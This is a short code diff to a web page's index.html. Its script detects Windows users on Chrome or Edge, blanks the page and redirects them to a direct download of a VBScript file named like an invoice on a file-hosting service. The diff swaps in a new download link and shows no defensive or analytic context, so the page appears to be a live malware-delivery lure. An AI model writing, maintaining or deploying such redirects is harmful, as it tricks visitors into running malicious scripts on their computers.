--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store5.gofile.io/download/direct/dea995d2-eea6-4598-8d38-ad5ba592b65d/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store-eu-par-3.gofile.io/download/direct/260db45f-b4a4-42d0-aaf9-3c24bf406611/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
